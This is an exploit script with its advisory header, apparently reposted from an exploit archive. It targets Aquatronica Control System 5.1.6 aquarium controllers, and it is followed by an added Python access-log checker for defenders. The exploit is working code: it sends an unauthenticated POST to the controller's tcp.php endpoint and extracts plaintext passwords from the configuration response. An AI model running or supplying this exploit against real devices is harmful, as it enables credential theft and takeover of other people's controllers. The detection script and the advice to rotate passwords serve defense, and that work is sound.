Aquatronica Control System 5.1.6 Password Disclosure Exploit
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
#
# Aquatronica Control System 5.1.6 Passwords Leak Vulnerability
#
#
# Vendor: Aquatronica s.r.l.
# Product web page: https://www.aquatronica.com
# Affected version: Firmware: 5.1.6
#                   Web: 2.0
#
# Summary: Aquatronica's electronic AQUARIUM CONTROLLER is easy
# to use, allowing you to control all the electrical devices in
# an aquarium and to monitor all their parameters; it can be used
# for soft water aquariums, salt water aquariums or both simultaneously.
#
# Desc: The tcp.php endpoint on the Aquatronica controller is exposed
# to unauthenticated attackers over the network. This vulnerability
# allows remote attackers to send a POST request which can reveal
# sensitive configuration information, including plaintext passwords.
# This can lead to unauthorized access and control over the aquarium
# controller, compromising its security and potentially allowing attackers
# to manipulate its settings.
#
# Tested on: Apache/2.0.54 (Unix)
#            PHP/5.4.17
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
#                             @zeroscience
#
#
# Advisory ID: ZSL-2024-5824
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5824.php
#
#
# 04.05.2024
#

import requests, html, re, sys, time
from urllib.parse import unquote

program = "TCP"
command = "ws_get_network_cfg"
function_id = "TCP_XML_REQUEST"

print("aquatronica_0day")

if len(sys.argv) != 2:
    print("Usage: python aqua.py <ip:port>")
    sys.exit(1)

ip = sys.argv[1]
url = f"http://{ip}/{program.lower()}.php"
post_data = {'function_id' : function_id.lower(),
             'command'     : command.upper()}

r = requests.post(url, data=post_data)

if r.status_code == 200:
    r_d = unquote(r.text)
    f_d_r = html.unescape(r_d)
    regex = r'pwd="([^"]+)"'
    rain = re.findall(regex, f_d_r)
    for drops in rain:
        print(' ',drops)
        time.sleep(0.5)
else:
    print(f"Dry season! {r.status_code}")

# 0day.today [2024-07-01] #
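For defenders, the advisory's description (an unauthenticated POST to tcp.php that returns configuration data) maps to a simple access-log check. The following is an added example, not part of the original advisory or the vendor's code; it assumes the controller's Apache writes common-format access logs, and the trusted management subnet, sample log lines and function names are hypothetical.

```python
import ipaddress
import re
from collections import Counter

# Assumption: management hosts allowed to reach the controller's web UI.
TRUSTED_NETS = [ipaddress.ip_network("192.168.10.0/24")]

# Apache common/combined log format: client, timestamp, request line, status.
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<uri>\S+)[^"]*" (?P<status>\d{3}) '
)

# Constructed sample lines (documentation address ranges), not real traffic.
SAMPLE_LOG = """\
192.168.10.5 - - [04/May/2024:10:00:01 +0000] "POST /tcp.php HTTP/1.1" 200 812
203.0.113.7 - - [04/May/2024:10:02:13 +0000] "POST /tcp.php HTTP/1.1" 200 812
203.0.113.7 - - [04/May/2024:10:02:14 +0000] "GET /index.php HTTP/1.1" 200 4096
198.51.100.9 - - [04/May/2024:10:05:40 +0000] "POST /TCP.php?x=1 HTTP/1.1" 404 210
not a log line
"""

def is_trusted(addr):
    try:
        ip = ipaddress.ip_address(addr)
    except ValueError:
        return False  # hostname or garbage in the client field: treat as untrusted
    return any(ip in net for net in TRUSTED_NETS)

def find_untrusted_tcp_php_posts(log_text):
    """Return (source, timestamp, status) for POSTs to tcp.php from untrusted hosts."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m or m["method"] != "POST":
            continue
        path = m["uri"].split("?", 1)[0].lower()  # ignore query string and case
        if path.endswith("/tcp.php") and not is_trusted(m["src"]):
            hits.append((m["src"], m["ts"], int(m["status"])))
    return hits

def summarize(hits):
    """Count hits per source; a 200 means configuration data was likely returned."""
    return Counter(src for src, _, status in hits if status == 200)

if __name__ == "__main__":
    for hit in find_untrusted_tcp_php_posts(SAMPLE_LOG):
        print(hit)
```

Any source that appears in the summary received a 200 from the endpoint, so the passwords stored on that controller should be treated as exposed and rotated once access to the web interface has been restricted.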